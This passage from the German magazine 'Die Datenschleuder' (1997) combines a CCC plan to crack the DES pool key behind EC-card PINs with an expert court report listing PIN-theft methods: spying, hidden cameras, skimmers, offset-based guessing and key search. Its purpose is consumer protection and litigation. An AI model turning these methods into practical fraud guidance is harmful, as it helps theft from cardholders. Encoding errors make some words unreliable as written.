ein Artikel in der FAZ vom 27.05.1997, dann
da§ noch dieses Jahr alle ec-Karten eine neue
PIN zugewiesen bekommen. Auf dem Weg
zur Abschaffung des 56-bit PoolschlŸssels
und ofßine-GAA hin zu 128-Bit InstitutsschlŸsseln und der Mšglichkeit, seinen PIN
selbst zu Šndern gibt es zwei Schritte.
ZunŠchst erhalten die ec-Karten Kunden eine
neue PIN mitgeteilt, die zum Tag X gilt. Dann
im zweiten Schritt (ca. 1998) kann der Kunde
die (neue) PIN selbst Šndern (auf 4-12
numerische Ziffern). Nach einer †bergangszeit mit zwei gleichzeitig gŸltigen PIN«s (also
der bisherigen (!) und der neuen, zunŠchst
nicht aber spŠter verŠnderbaren) von drei bis
fŸnf Monaten stirbt dann die alte PIN und

EC-Karten Unsicherheit
Spur 3 des Magnetstreifens wird gelšscht
(Offsets etc.). Ofßine-Autorisierung gibt es
dann nur noch mit Chipkartenfunktion; das
hei§t in die elektronische Geldbšrse wird
eine Authorisierungsfunktion fŸr die ECKarte eingebaut. (Ist sie aber in den jetzt
bereits ausgegebenen Karten noch nicht.)
Die entscheidende technische Schwachstelle
des EC-Kartensystems ist und bleibt der 56bit DES Pool-SchlŸssel. Das haben offenbar
auch die Banken erkannt, erklŠrt die
Vorgehensweise nach FAZ. ZusŠtzlich sollte
mensch wissen, da§ der Pool-SchlŸssel, der
(siehe Schema) die Errechenbarkeit des PINCodes zu *jeder* EC-Karte (mit dem Offset)
ermšglicht, seit EinfŸhrung des ECKartensystems nicht geŠndert wurde.
Im Sinne der Evolution
Um die unheilsvolle Behauptung der Banken,
der PIN sei aufgrund der Kartendaten nicht
errechenbar ein fŸr alle mal in den Bereich
der Unwahrheit zu rŸcken - und somit die
Haftungsfrage zu lšsen und sich nicht mit
den kosmetischen Spielerein zufriedenzugeben, entstand im CCC die Idee, den 56-Bit
PoolschlŸssel doch einfach zu knacken. Und
das steht jetzt als Projekt an. Konkret haben
wir uns dazu entschlossen, eine SchlŸsselknackmaschine zu bauen (verteiltes Rechnen
dauert zu lange). Die Detailfragen, etwa ob
wir uns mit ASIC«s auf eine kostengŸnstigere, aber auf 56bitDES beschrŠnkt Lšsung einlassen oder mit FPGA«s eine ßexiblere, aber
aufwendigere und teurere Maschine konstruieren beÞnden sich in der Diskussion (z.B.
de.org.ccc). Auf der HIP«97 Konferenz in
Holland (siehe diese Datenschleuder) soll die
Konstruktionsdiskussion šffentlich gefŸhrt
und die EntscheidungsÞndung baldmšglichst
abgeschlossen werden.
Abgesehen von den nicht ganz kleinen
technischen Problemen, die im Rahmen des
Projektes zu lšsen sind gibt es natŸrlich noch
ein Þnanzielles. Unter BerŸcksichtigung des
Zeitdrucks (Pool-SchlŸssel mu§ noch dieses
Jahr vorliegen, bzw [...selberdenken...]), der
zu lšsenden technischen Probleme (ASICErstellung bzw. FPGA-Programmierung,
Lieferzeiten, Stromversorgung (!), Bussystem)
ist das Projekt unter 1 Million DM mit den

zur VerfŸgung stehenden Ressourcen schwerlich zu lšsen. Nach 2 Wochen Diskussion
haben wir uns zmd. von jeglichen
ãselberlštenÒ-Lšsungen entfernt und
Outsourcing von Teilaufgaben (Hardware) als
sinnvoll befunden.
Wo das Geld hernehmen?
Um es gleich klarzustellen: die Aktion Þndet
in Kooperation mit VerbraucherschutzverbŠnden und RechtsanwŠlten statt um
unzweifelhafte legale AktivitŠt im Sinne des
Verbraucherschutzes sicherzustellen. Es geht
neben der šffentlichen Beleuchtung der ECKartenproblematik natŸrlich auch darum,
auch dem letzten DAU klarzumachen, da§
der 56bit-DES unsicher ist; denn die Geheimdienste haben lŠngst Maschinen um den
kompletten 56bit-Keyspace in weniger als 10
Sekunden durchzurechnen und so trotz
Brute-Force effektiv zu arbeiten. Der BND
etwa betreibt zwei solcher Rechner (Thinking
Machine Corporation). Im Grunde wirft die
Freigabe von 128bit-SchlŸsseln (IDEA) durch
die Amerikaner (siehe Meldung in dieser DS)
schon ganz andere Fragen bezŸglich geheimdienstlicher AktivitŠten auf.
In VorgesprŠchen mit entsprechenden Stellen
haben wir bereits Kooperationsbereitschaft
zugesichert bekommen. FŸr konkrete
Aquisearbeit sollte natŸrlich das technische
Realisierungskonzept stehen.
Denkbar ist technisch auch die Realisierung
des von Michael J. Wiener bereits 1993
beschriebenen ãEfÞcient DES Key SearchÒ
Maschinchens. Die Diskussion ist hiermit
eršffnet. FŸr Anregung, technische Hinweise
und sonstige Form der Mitarbeit sind wir
dankbar.
Andy MŸller-Maguhn, andy@ccc.de
(1) siehe Diskussion in de.org.ccc
(2) ist in der Newsgroup de.org.ccc bzw. kann bei mir
per mail angefordert werden
(3) a«la Card Ausgabe 20-21/1997 Seite 254d: ã[...] vereinbart, da§ €u§erungen zu diesem Thema nur vom
Zentralen Kreditausschu§ kommen [...]Ò.
(4) das ZKA faxte uns trotz telefonischer Zusage die
Stellungnahme nicht zu, daher Zitate ebenfalls
entnommen aus der a«la Card Ausgabe 20-21/1997

Die Datenschleuder
Nummer 59, Juni 1997

Gutachten 9422/03
Gutachten 9422/03
vom 25. Februar 1997
Begutachtung der Sicherheit einer EC-CARD
Im Rechtsstreit < > / Deutsche Postbank AG
vor dem Oberlandesgericht Hamm
Az.: 31 U 72 / 96
Gutachter:
Prof. Dr. Dipl.-Ing. Manfred Pausch
von der Industrie- und Handelskammer Darmstadt
šffentlich bestellter und vereidigter SachverstŠndiger
fŸr Informationsverarbeitung im aufmŠnnischen und
administrativen Bereich (Kleinrechner-Systeme)

Inhaltsverzeichnis
1. Auftrag
2. Beweislage
3. Ausgangslage
4. Risikoanalyse
4.1 Personen-Kategorien
4.1.1 Mitarbeiter
4.1.2 Vertragspersonal
4.1.3. Systemberechtigte Teilnehmer
4.1.4 Systemfremde Teilnehmer
4.2 Zahlungssystem
4.3 Komponenten
4.4 Risiken
4.4.1 Komponente: GAA/POS-Terminal
4.4.1.1 Konstruktive MŠngel
4.4.1.2 Aufstellungsort
4.4.1.3 †berwachung
4.4.1.4 Automatenraub
4.4.2 Programme und Netze
4.4.2.1 Verrat und Korruption
4.4.2.2 Programmfehler
4.4.2.3 Netzsicherheit

Die Datenschleuder
Nummer 59, Juni 1997

4.4.3 Komponente: Magnetstreifenkarte
4.4.3.1 Produktionsfehler
4.4.3.2 Kartendaten
4.4.3.3. VerknŸpfte Sicherheit/MM
4.4.3.4. Persšnliche Geheimzahl/PIN
4.5 Methoden
4.5.1 AusspŠhung
4.5.1.1 Passive AusspŠhung
4.5.1.2 Aktive AusspŠhung
4.5.2 Ermittlung
4.5.2.1 Durch Abfangen
4.5.2.2 Empirische Ermittlung per PIN
4.5.2.3 Die mathematische Ermittlung
4.5.2.4 Die elektronische Ermittlung
4.5.3 Manipulation
5. Zusammenfassung der Risikoanalyse
6. Beantwortung der Beweisfragen
7. ErklŠrung des SachverstŠndigen
1. Auftrag
...
Der relevante Teil des Beweisbeschlusses lautet:
a) Unter welchen Voraussetzungen und mit
welchem zeitlichen Aufwand lŠ§t sich die
PIN einer gestohlenen ec-Karte von einem
TŠter ermitteln?
b) Ist es dabei denkbar, da§ ein TŠter diese
innerhalb von 30 Minuten herausÞndet, gegebenfalls mit Hilfe von Erkenntnissen aus
einschlŠgigen Vortaten, um welche
Vorkenntnisse m٤te es sich dabei handeln?`
...

EC-Karten Unsicherheit
3. Ausgangslage
Mit der Magnetkarte fehlt ein extrem
wichtiges Beweismittel, das ein
SachverstŠndiger einer umfangreichen, u.U.
proze§entscheidenden, forensischer
Untersuchung unterziehen kann. ... Durch die
derzeitige Unmšglichkeit einer Begutachtung
der streitbefangenen Magnetkarte kann nicht
bewiesen werden, ob die Kartendaten
manipuliert worden sind.
Insbesondere kann nicht festgestellt werden,
ob der FehlbedienungszŠhler zurŸckgesetzt
worden ist. Es gibt also keine gesicherten
Erkenntnisse fŸr die Behauptung der
Beklagten, da§ der TŠter beim ersten Versuch
bereits die richtige PIN eingegeben hat. Es ist
sehr wohl denkbar, da§ auch an anderen
Automaten bereits Versuche unternommen
wurden, die bisher nicht zur Kenntnis des
Gerichts gebracht worden sind.
Nach Aktenlage ist auch nicht zu erkennen,
ob Ÿberhaupt eine PrŸfung der PIN am
Geldausgabeautomaten vorgenommen
worden ist. Die vorgelegten Buchungsbelege
zum Konto des KlŠgers sind dazu nicht
geeignet. (Auf dieser Grundlage allein kšnnte
auch eine simple Fehlbuchung bei der
Beklagten durch falsche Kontozuordnung
nicht ausgeschlossen werden.) HierŸber kann
nur das Transaktionsprotokoll, das den
Verkehr zwischen dem Automaten und dem
Rechenzentrum aufzeichnet, in Verbindung
mit dem Kontrollstreifen des Automaten
Auskunft geben. Diese Dokumente liegen der
Akte aber nicht bei.
Es ist also gar nicht sicher, da§ der Automat
zum Zeitpunkt der streitgegenstŠndlichen
Abhebung online, d.h. mit dem
Rechenzentrum in Verbindung war. Auch ist
nicht ersichtlich, ob eine MM-PrŸfung
vorgenommen worden ist. Es kšnnte auch ein
Hardware- oder Software-Fehler vorgelegen
haben. HierŸber kann nur die Auswertung
der Dokumente durch einen
SachverstŠndigen Auskunft geben.
Die von der Beklagten vorgelegten Gutachter
der Gutachter Haverkamp und Dr. Heuser
(BI. 66 und 157 d.A.) sind bezŸglich der

Wahrscheinlichkeit die richtige PIN zufŠllig
einzugeben, falsch. TatsŠchlich gibt es bei ecKarten nur die Zahlen von 1000 bis 9999. Bei
drei Versuchen ergŠbe sich damit aus
Laiensicht eine Wahrscheinlichkeit von
1:3000. Wenn man jedoch wei§, da§ bestimmte Ziffern in der PIN hŠuÞger vorkommen als
andere, so erhšht sich die Wahrscheinlichkeit
auf 1:682 (1). Ein Experte, der auch noch die
auf der Karte beÞndlichen Offsets berŸcksichtigt, bringt es sogar auf ca. 1:150 (2). Da die
DIN/ISO 4909, die die Organisation der
wichtigen Spur 3 auf ec-Karten beschreibt,
jedermann zugŠnglich ist und auch in einer
Hackerzeitung (3) veršffentlicht wurde, mu§
dieses ãFachwissenÒ auch einschlŠgigen
TŠterkreisen unterstellt werden.
Die ungesicherte Erkenntnislage in diesem
Fall erzwingt deshalb zuerst eine
Risikoanalyse des automatisierten
Zahlungssystems, damit das Gericht einen
†berblick Ÿber die vielfŠltigen Methoden des
Kartenmi§brauchs gewinnen und diese
gewichten kann, bevor die Beweisfragen im
einzelnen beantworten werden kšnnen.
Die Darstellung der komplexen
ZusammenhŠnge soll anhand des
dargestellten Schaubildes erfolgen.
4. Risikoanalyse
FŸr alle kryptographischen Verfahren mu§
gelten, da§ ihre Sicherheit nur auf der
Geheimhaltung der verwendeten Schl٤ssel
beruhen darf, nicht aber auf der
Geheimhaltung der angewandten Verfahren.
Eine Geheimhaltung der Verfahren
implementiert, da§ Au§enstehende die
Sicherheit des Systems durchbrechen kšnnen,
also reale SicherheitslŸcken.
Die Kryptologie als Spezialgebiet der
Mathematik / Informatik wird im Hinblick
auf Sicherheit und VertrauenswŸrdigkeit der
automatisierten Systeme in unserer fortschreitenden Informationsgesellschaft ein
steigender Stellenwert zukommen. Ihre Rolle
mu§ deshalb der šffentlichen und politischen
Diskussion unterworfen werden.
Die Verantwortung fŸr die Sicherheit des
heutigen automatisierten Zahlungssystems
obliegt der Kreditwirtschaft. Sie hat den

Die Datenschleuder
Nummer 59, Juni 1997

Gutachten 9422/03
zentralen Sicherheitsbereich
ãSchlŸsselmanagement nach dem durch den
Stand der Technik vorgebenen Standard zu
organisieren. Dieser Bereich des
Sicherheitsrisikos wird in der nachfolgenden
Risikoanalyse des automatisierten
Zahlungssystems nicht berŸcksichtigt. Die
Untersuchung konzentriert sich vielmehr auf
den durch die Einwirkung durch Dritte
begrenzten Hard- und Softwarebereich, weil
die sogenannten ãPhantomabhebungenÒ in
der Mehrzahl hiermit erklŠrt werden kšnnen.
(Solange die genauen Methoden der
behaupteten unberechtigten Kontenzugriffe
nicht eindeutig feststehen, hat es sich in der
Fachliteratur eingebŸrgert, von
ãPhantomabhebungenÒ zu sprechen.)
Bei der Beschreibung der im Schaubild dargestellten Elemente ... folgt der SachverstŠndige
der dort verwendeten Bezeichnung und
Ordnung. ...
4.4.3.4 Persšnliche Geheimzahl PIN
Es werden verschiedene Verfahren zur
Generierung einer PIN angewandt (16). FŸr
die AbschŠtzung des Sicherheitsrisikos kann
man sich jedoch auf den Kern, das allseits
verwendete DES-VerschlŸsselungsverfahren,
beschrŠnken.
Dieses soll durch das Flu§diagramm auf der
folgenden Seite veranschaulicht werden.
Darin ist zur besseren VerstŠndlichkeit die im
institutsinternen Verfahren benutzte PIN als
ãnatŸrlicheÒ, die im institutsŸbergreifenden
Verfahren benutzte PIN als ãendgŸltigeÒ PIN
bezeichnet.
4.5. Methoden
GrundsŠtzlich gilt: Was verschlŸsselt werden
kann, kann auch wieder entschlŸsselt
werden. Die Methode, wie man zu einer PIN
kommt, die zu einer fremden Magnetkarte
gehšrt, ist nur eine Frage des Aufwandes,
also der Zeit, der Kosten und der
vorhandenen Ressourcen.
4.5.1 AusspŠhung
4.5.1.1. Passive AusspŠhung

Die Datenschleuder
Nummer 59, Juni 1997

Die AusspŠhung ist die mit Abstand
verbreitetste Methode, an eine fremde PIN zu
kommen. Es kann an Geldausgabeautomaten,
besonders in verkehrsreichen Zonen, oder
POS-Systemen in KaufhŠusern und
Tankstellen hŠuÞg beobachtet werden, da§
sich Dritte im unmittelbaren Einsichtsbereich
der Tastatur aufhalten und so die PIN ohne
weitere Hilfsmittel optisch erkennen kšnnen
(Pfad 5.1 - 5.1.1. - 5.1.3. - 5.1.5). Die
konstruktiven Merkmale fast aller in
Gebrauch beÞndlicher GAA unterstŸtzen diese Methode in nahezu strŠßicher Weise.
Abhilfe ist mit einfachsten Mitteln sehr
wirksam zu schaffen. HŠuÞg fehlt dem
legalen Bediener des GAA aber auch das
Bewu§tsein fŸr eine mšgliche AusspŠhung,
sei es da§ der/die Dritte Freund/Freundin
oder Verwandter/Verwandte ist, denen
solche Absicht nicht unterstellt wird, oder sei
es, da§ er (besonders Šltere Leute) die
Mšglichkeit des AusspŠhens unterschŠtzt.
FŸr diese Methode gibt es in der praktischen
Erfahrung des Autors als SachverstŠndiger
eine Vielzahl von Beispielen, die aber hier
wegen ihre Offenkundigkeit nicht einzeln
vorgestellt werden sollen.
Trotzdem mŸssen die Erfolgschancen der einfachen optischen AusspŠhung untersucht
werden. Wenn bei einem Touchscreen-GAA
vier AbdrŸcke ohne Reihenfolge der Eingabe
zu erkennen sind, so wird durch
systematisches Ausprobieren spŠtestens im
24. Versuch die richtige PIN ermittelt.
Statistisch gesehen betrŠgt die Chance 1:12.
Bei drei zulŠssigen Eingabeversuchen wŸrde
auf diese Weise fŸr jede vierte (gestohlene)
Karte die richtige PIN eingegeben werden
kšnnen. Eine wahrlich gute Trefferquote!
4.5.1.2. Aktive AusspŠhung
Aus Norwegen, Schweden und England sind
FŠlle (17) bekannt, in denen kriminelle
Vereinigungen Wohnungen gegenŸber von
GAA in verkehrsreichen Zonen angemietet
hatten. Von dort spŠhten sie mit FernglŠsern
bzw. Kameras mit Teleobjektiven PIN aus
(Pfad 5.1 - 5.1.2 - 5.1.4 - 5.1.5). Die Bediener
wurden anschlie§end geziehlt bestohlen bzw.
beraubt und ihre Konten geplŸndert.

EC-Karten Unsicherheit
Eine auch in Deutschland verbreitete Variante
dieser Methode ist das Anbringen von MiniVideokameras (18) (54*54*34 mm), die die
Bilder per Funk Ÿber eine Strecke bis zu 400m
Ÿbertragen. Die entsprechende betriebsfertige
AusrŸstung (Minikamera und Monitor) ist im
Elektronikhandel - natŸrlich nicht fŸr diesen
Zweck - fŸr weniger als 1.000,- DM erhŠltlich
(Anlage 2).
In einem anderen Fall benutzte in einer westdeutschen Gro§stadt ein Elektronik-Freak
selbstgebaute VorsatzgerŠte, die er
nacheinander an verschiedene GAA anbrachte, und Ÿbertrug per Funk sŠmtliche Daten
der Karten einschlie§lich zugehšriger PIN
in seine Computer-Datenbank (19).
Anschlie§end plŸnderte er die Konten. Den
Kunden sind die VorsatzgerŠte nicht aufgefallen.
...
4.5.2.2 Empirische Ermittlung der PIN
Entgegen anderslautenden Behauptungen der
Kreditwirtschaft werden auch heute
(beweisbar) noch Geldausgabeautomaten
hŠuÞg ofßine betrieben. Das mu§ auch allein
schon wegen der Wartungszeiten technischer
Einrichtungen und zur Aufrechterhaltung des
Betriebes bei Stšrungen der Fall sein. Beim
ofßine-Verfahren wird ein ãPoolschlŸsselÒ
eingesetzt. Die Kartendaten sind deshalb bei
der Herstellung mit mehreren verschiedenen
SchlŸsseln verschlŸsselt worden.
Die zugehšrigen Offsets sind auf der Karte
abgespeichert und kšnnen ausgelesen
werden.
Im deutschen ec-Geldautomatensystem
werden maximal 2 SchlŸssel vorrŠtig
gehalten und wahlweise eingesetzt (21):
- Der InstitutsschlŸssel, der zur Ermittlung
und PrŸfung der persšnlichen Geheimzahl
der eigenen Kunden des Instituts
herangezogen wird, das den ec-GA betreibt.
- Der PoolschlŸssel, der zur Ermittlung und
PrŸfung der persšnlichen Geheimzahl aller
anderen Benutzer dient.
Bei institutsinterner Nutzung ist die vom
Kunden eingetastete persšnliche Geheimzahl

mit dem Ergebnis der DES-AlgorithmusRechnung zu vergleichen.
Bei institutsŸbergreifender Nutzung ist
folgender Rechenvorgang anzuwenden:
Eingetastete persšnliche Geheimzahl des
Kunden
- Ergebnis des DES-Algorithmus mit
PoolschlŸssel
= jeweils gŸltiger Offset
oder
Ergebnis des DES-Algorithmus mit
PoolschlŸssel
+ jeweils gŸltiger Offset
= vom Kunden eingetastete persšnliche
Geheimzahl
Einer dieser PoolschlŸssel ist in einem
Hardware-Sicherheits-Modul (HSM) im
Geldausgabeautomaten gespeichert. Bei der
OFFLINE-PrŸfung verschlŸsselt der
GAA die Kartendaten mit dem PoolschlŸssel.
Wenn das Ergebnis zusammen mit dem
PoolschlŸssel der vom Kunden eingebenen
PIN entspricht, wird die Eingabe vom GAA
akzeptiert.
Wie gro§ ist die Chance, die PIN zu erraten?
Dazu mu§ man wissen, da§ es bei der PIN
nur 9000 Mšglichkeiten gibt. Unterstellt man
3 Versuche, bevor die Karte bei falscher PINEingabe einbehalten wird, so ergibt sich in
erster (laienhafter) NŠherung eine
Wahrscheinlichkeit von 1:3000 = 0,00033.
Statistisch korrekt ergibt sich fŸr das Erraten
der PIN in drei Versuche unter
BerŸcksichtigung der Entropie jedoch eine
Wahrscheinlichkeit von 0,00044.
Wenn, z.B. durch AusspŠhung, bereits Teile
der PIN bekannt sind, erhšht sich die
Wahrscheinlichkeit naturgemŠ§
entsprechend. Dabei kommt es aber darauf
an, ob die erste und/oder eine der
nachfolgenden Stellen der PIN bekannt sind.
Denn in der PIN kommen nicht alle Ziffern
gleich hŠuÞg vor. Bestimmte Ziffern kšnnen
z.B. nicht in der ersten Stelle der PIN
vorkommen.

Die Datenschleuder
Nummer 59, Juni 1997

Gutachten 9422/03
In Wirklichkeit ist die Chance dadurch grš§er
als der Laie vermutet, da§ manche Zahlen in
der PIN hŠuÞger vorkommen als andere. Mit
diesem Wissen betrŠgt die Chance, die
richtige PIN zu erraten, 1:682 = 0,00147. Mit
dem Expertenwissen Ÿber die Offsets kann
die Wahrscheinlichkeit sogar auf ca. 1:150 =
0,00667 erhšht werden.
4.5.2.3 Die mathematische Ermittlung der PIN
Die Kreditwirtschaft stŸtzt ihre Aussage
bezŸglich der Sicherheit hŠuÞg auf den
sogenannten ãBrute Force AttackÒ und leitet
daraus den Zeitbedarf fŸr die Ermittlung des
SchlŸssels von derzeit 1900 Jahren (22) PCRechenzeit ab.
Mit diesem Ansatz kann durch
Nachvollziehen der VerschlŸsselung der vollstŠndige SchlŸssel eines kartenausgebenden
Institutes mit allen 56 wirksamen Stellen
ermittelt werden. Das erfordert natŸrlich
selbst bei gro§zŸgigsten Ressourcen auf
einem PC immens viel Zeit.
Es sind auch spezielle GerŠte und
Schaltungen veršffentlicht worden, mit denen
die Berechnung schneller erfolgt. Eine
detaillierte Konstruktionsbeschreibung einer
solchen Maschine hat der kanadische
Kryptologe Michael J. Wiener von Bell
Northern Research bereits 1993 vorgestellt
(23). Da fŸr Kredit- und Bankkarten weltweit
nahezu die selben VerschlŸsselungsverfahren
angewandt werden, kann die WienerMaschine auch sozusagen universell
eingesetzt werden.
In Anbetracht dieser technischen
Entwicklung kommt den bereits seit
EinfŸhrung des DES-Verfahrens
vorgetragenen Bedenken Ÿber eine
ausreichende SchlŸssellŠnge wachsende
Bedeutung zu. Die SchlŸssellŠnge von 56 bit
beruht nicht nur auf der damaligen KapazitŠt
der eingesetzten ICs, sondern ist nicht zu
letzt darauf zurŸckzufŸhren, da§ die
amerikanischen Sicherheitsbehšrden in der
Lage bleiben wollten, den mit dieser
SchlŸssellŠnge codierten Datenverkehr leicht
entschlŸsseln zu kšnnen.
FŸhrende amerikanische Kryptologen haben
bereits 1993 auf die unzureichende

Die Datenschleuder
Nummer 59, Juni 1997

SchlŸssellŠnge aufmerksam gemacht. Die
aktuellere SchŠtzung dieser Wissenschaftler
vom Januar 1996 ist nachstehend wiedergegeben (24):
Nach heutigem Stand kšnnten selbst bei der
10.000 $-Variante ASICS eingesetzt werden,
ohne da§ sich die Kosten wesentlich erhšhen.
Unter dieser Vorraussetzung kšnnte die
SchlŸsselsuche in ca. 14 Tagen durchgefŸhrt
werden. (Falls die Spezialmaschine selbst entwickelt werden mu§, gilt: Bei allen Varianten
mŸssen noch die Entwicklungskosten in
Hšhe von ca. 500.000 $ berŸcksichtigt
werden. Diese wurden bei Erstellung der
Tabelle von den Autoren offensichtlich
vergessen.)
Da die SchlŸsselsuche mit der WienerMaschine nur ein einziges Mal fŸr jeden
SchlŸssel durchgefŸhrt werden mu§, ist die
Verarbeitungsgeschwindigkeit im Grunde bei
der Risikobetrachtung von nachgeordneter
Bedeutung. Der ãTŠterÒ mu§ auch nicht
selbst die SchlŸsselsuche durchfŸhren . Es ist
herauszustellen, da§ die SchlŸsselsuche mit
der Wiener-Maschine von anderen Personen,
zu anderer Zeit und an anderem Ort durchgefŸhrt werden kann. Wenn also ein
PoolschlŸssel mit der Wiener-Maschine in 14
Tagen geknackt werden kann, so ist das bei
diesen Investitionen ein lukratives GeschŠft.
Denn die gefundenen SchlŸssel kšnnen an
Interessierte verkauft werden, die dann mit
kleinen Laptop-Computern in Sekunden die
richten PIN zu gestohlenen ec-Karten
errechnen kšnnen. Bei dezenter Anwendung,
die eine Entdeckung unwahrscheinlich
macht, Ÿbersteigt der ãErtragÒ die
ãInvestitionÒ um ein Vielfaches.
Es sei au§erdem noch angemerkt, da§ die
Kosten fŸr FPGAs und ASICs trotz des zur
Zeit hšheren Dollarkurses seit der Erstellung
der vorherstehenden Tabelle erheblich gesunken sind. Auch mu§ auf die PC-gestŸtzte
Zeit- und Kostenrechnung im Amateurbereich
aufmerksam gemacht werden, die das Potential der TŠter nur auf dieser Basis vergleichbar machen kann. Das entspricht aber nicht
den Gegebenheiten in Deutschland. Mit
leistungsfŠhigeren Rechnern (z.B. gebrauchten Gro§rechnern, die wegen der galop-

EC-Karten Unsicherheit
pierenden technischen Innovation dieser
Systeme nahezu verramscht werden) lassen
sich Kosten und Zeiten dramatisch senken.
Weil ein Dieb aber nur an der vierstelligen
PIN interessiert ist, wird der EinzeltŠter in
der Praxis die Investition scheuen. Es ist
jedoch durchaus vorstellbar, da§ sich internationale Organisationen dieser Methode bedienen kšnnten, um alle PIN zu ãknackenÒ.
Der ãSmart AttackÒ (25) basiert mehr auf
pragmatischer Methodik und nutzt alle
mathematischen EinschrŠnkungen und
Erleichterungen der realen Gegebenheiten
(z.B. die Wertepaare sind nur fŸr wenige
Punkte mathematisch deÞniert und die reale
Werteߊche ist nur eine geringe Untermenge
der mathematischen Gesamtmenge) sowie
das spezielle Verfahrens-Design zur Ermittlung vierstelligen PIN aus. Wie schon dargelegt erhšht sich durch Einbeziehung der auf
der Karte abgespeicherten Offsets die Chance
fŸr den Experten, bei zufŠllig gewŠhlten
Karten, bereits auf 1:150. Die Chancen vergrš§ern sich in der Praxis noch, weil der
PoolschlŸssel seit langer Zeit nicht verŠndert
wurde. Der Autor konnte im praktischen
Versuch fŸr ein Amtsgericht die gesuchte
richtige PIN bereits im 17. Versuch mittels
Erhšhung der Ordnung einer Spline-Funktion
ermitteln.
4.5.2.4 Elektronische Ermittlung der PIN
Das elektronische Abfangen von Daten
wurde bereits unter Punkt 4.2.3
(Netzsicherheit) eršrtert. An dieser Stelle soll
deshalb auf die Ermittlung der PIN unter
Verwendung von Originalteilen aus GAA eingegangen werden.
Aufgrund der Ofßine-Struktur des deutschen
GAA-Systems sind die Mšglichkeiten der
Errechnung und PrŸfung der PIN im GAA
eingebaut. Aus Skandinavien ist ein Fall
bekannt (26), in dem diese Komponenten mit
der GAA entwendet wurden. Die Diebe, die
Ÿber entsprechende Elektronik-Kenntnisse
verfŸgten, bauten daraus ein GerŠt, das bei
gegeben Kartendaten blitzschnell alle PINNummern abfragte, bis die richtige gefunden
war. So konnte die unbekannte PIN in
Sekunden ermittelt werden. Auch in

Deutschland kann diese Mšglichkeit nicht
ausgeschlossen werden. Ernstzunehmende
Informationen aus der Szene deuten darauf
hin.
4.5.3 Manipulation
Manipulationen der auf der Magnetkarte
abgespeicherten Daten zur Herstellung eines
Zustandes, mit dem die Akzeptanz einer
bestimmten oder aller PIN-Eingaben erreicht
werden sollen, lassen sich in der Mehrzahl
durch forensische Untersuchungen der verursachenden Karte nachweisen (Pfad 5.3 - 5.3.1
+ 5.3.2). Das hat der SachverstŠndige in
mehreren FŠllen bewiesen. Die Ÿbliche
Vernichtung der Magnetkarte durch das
ausgebende Kreditinstitut ist deshalb als weiteres Risiko zu erwŠhnen. Das einfache
Zerschneiden der Karte vernichtet nicht in
allen FŠllen die Daten, so da§ ein Fachmann
hŠuÞg noch Auswertungen vornehmen kann.
Es sind aber auch FŠlle bekannt (27), in denen
die BetrŸger VerŠnderungen an den
Kartendaten vorgenommen haben, um
beispielsweise den FehlbedienungszŠhler
zurŸckzusetzen, den VerfŸgungsrahmen zu
vergrš§ern oder die GŸltigkeit zu erreichen.
Auch das lŠ§t sich in der Regel anhand der
eingezogenen Karte durch forensische
Untersuchungen nachweisen.
DarŸber hinaus sind viele Kombinationen der
vorgestellten Methoden denk- und machbar.
Auf die Entkoppelung von Zeit und Raum
bei der AusspŠhung mu§ besonders
hingewiesen werden, weil hierdurch die
AufklŠrung extrem erschwert wird.
Beispiel: Wenn ein Kunde bei der Eingabe seiner PIN in einer Tankstelle unbemerkt ausgespŠht wird, so kann seine IdentitŠt vom TŠter
in der Regel Ÿber das KFZ-Kennzeichen oder
die Verfolgung seines Fahrzeugs festgestellt
werden. Es wurde berichtet, da§ dann
Auftragsdiebe oder AuftragsrŠuber nach einigen Tagen dem Auftraggeber (AusspŠher) die
Magnetkarten beschafft haben, der dann das
Konto der Betroffenen ausplŸnderte. Der
Betroffene wird sich in der Regel nicht mehr
an die Mšglichkeit einer AusspŠhung in der
Tankstelle oder gar an den TŠter errinern.
...

Die Datenschleuder
Nummer 59, Juni 1997

Gutachten 9422/03
Es ist auch naheliegend, da§ die Ende 1995 in
den Niederlanden von Unbekannten mit
Kartenkopien getŠtigten Abhebungen
zulasten Banken in JŸlich und HŸckelhoven
(28), auf die gleichzeitige Anwendung mehrerer der vorgestellen Methoden zurŸckgefŸhrt
werden kann. Es kann nicht ausgeschlossen
werden, da§ hier die PIN von ca. 100 Kunden
mittels einer Minivideokamera unbemerkt
ausgespŠht und die Kartendaten mit einem
elektronischen VorschaltgerŠt erfa§t worden
sind. In diesem Fall belŠuft sich die
Schadenssumme auf ca. 300.000,- DM. In
Anbetracht der besonderen UmstŠnde haben
die Banken allerdings die Kunden
entschŠdigt.
5. Zusammenfassung der Risikoanalyse
Vorstehend weurde eine systematische
Risikobetrachtung fŸr den automatisierten
Zahlungsverkehr mit Magnetkarten
vorgestellt. Die QuantiÞzierung der
aufgezeigten Risiken kann nicht verbindlich
vorgenommen werden. Dunkelziffern sind
nicht bekannt. Gemessen an der Zahl der in
der Kriminalstatistik (29) dokumentierten
FŠlle beinhaltet die Sammlung des
SachverstŠndigen nur eine Šu§erst geringe
Menge. Diese wird allerdings durch laufende
Erfassung stŠndig aktualisiert.
...
Einige der vorgestellen Methoden sind so
ãerfolgreichÒ, da§ entgegengehalten werden
kann, wenn diese Verfahren tatsŠchlich in der
Praxis angewandt wŸrde, hŠtte es einen nicht
zu Ÿbersehenden Effekt hervorgerufen.
Dieser sei aber bisher nicht erkennbar.
TatsŠchlich erhebt sich aber hier die Frage
nach dem intellektuellen Potential der TŠter.
In Anbetracht der schwerwiegenden Materie
kann es ein gefŠhrlicher Trugschlu§ sein,
wenn die ãGentleman-TŠterÒ auf das Niveau
herkšmmlicher Geldschrankknacker des EdeTyps reduziert werden.
...
Es lŠ§t sich auch beim automatisierten
Zahlungssystem, wie bei jedem anderen technischen System, nicht leugnen, da§ es
risikobehaftet ist. Die Frage ist nur, ob es sich
um das unvermeidbare ãRestrisikoÒ handlet,

Die Datenschleuder
Nummer 59, Juni 1997

das der Benutzer zu tragen hat oder ob das
Risiko nach dem Stand der Technik mit
vertretbarem Aufwand verringert werden
kann. Der SachverstŠndige ist der
Auffassung, da§ das Risiko durch einfachste
Ma§nahmen drastisch reduziert werden
kann, z.B. durch Sichtschutz zur
Erschwerung der AusspŠhung
...
Es ist auch wichtig, die Zugangsmšglichkeit
zu den beschrieben Verfahren abzuwŠgen.
Das hei§t, wie hoch sind die Investitionen
und Ÿber welche QualiÞkationen mŸ§en die
TŠter verfŸgen? Nur nach Beantwortung
dieser Fragen lŠ§t sich entscheiden, ob man
bei jedem in der Kriminalstatistik
aufgefŸhrten Kartenmi§brauchsfall die
